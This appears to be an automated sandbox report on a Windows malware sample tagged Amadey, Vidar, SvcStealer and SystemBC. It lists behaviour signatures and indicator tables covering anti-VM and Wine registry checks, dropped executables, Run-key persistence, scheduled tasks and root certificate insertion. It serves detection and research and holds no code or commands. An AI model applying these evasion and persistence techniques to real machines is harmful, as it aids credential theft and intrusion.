Malware Analysis Report

2025-04-03 09:22

Sample ID 250305-ehlqhaykt6
Target e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
SHA256 e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35
Tags
amadey svcstealer systembc vidar 092155 ir7am defense_evasion discovery downloader execution persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35

Threat Level: Known bad

The file e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe was found to be: Known bad.

Malicious Activity Summary

amadey svcstealer systembc vidar 092155 ir7am defense_evasion discovery downloader execution persistence spyware stealer trojan

Detects SvcStealer Payload

Amadey

Svcstealer family

Vidar family

Amadey family

SvcStealer, Diamotrix

Systembc family

Vidar

SystemBC

Detect Vidar Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of local email clients

Loads dropped DLL

.NET Reactor protector

Checks computer location settings

Identifies Wine through registry keys

Reads user/profile data of web browsers

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Browser Information Discovery

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-05 03:56

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 03:56

Reported

2025-03-05 03:59

Platform

win7-20240903-en

Max time kernel

150s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\djrq\nbiciq.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\djrq\nbiciq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\djrq\nbiciq.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
N/A N/A C:\ProgramData\djrq\nbiciq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\ProgramData\djrq\nbiciq.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\defacfcbcbdbaac = "\"C:\\ProgramData\\defacfcbcbdbaac.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\6eaad46262.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\6eaad46262.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
File created C:\Windows\Tasks\futors.job C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\djrq\nbiciq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe N/A
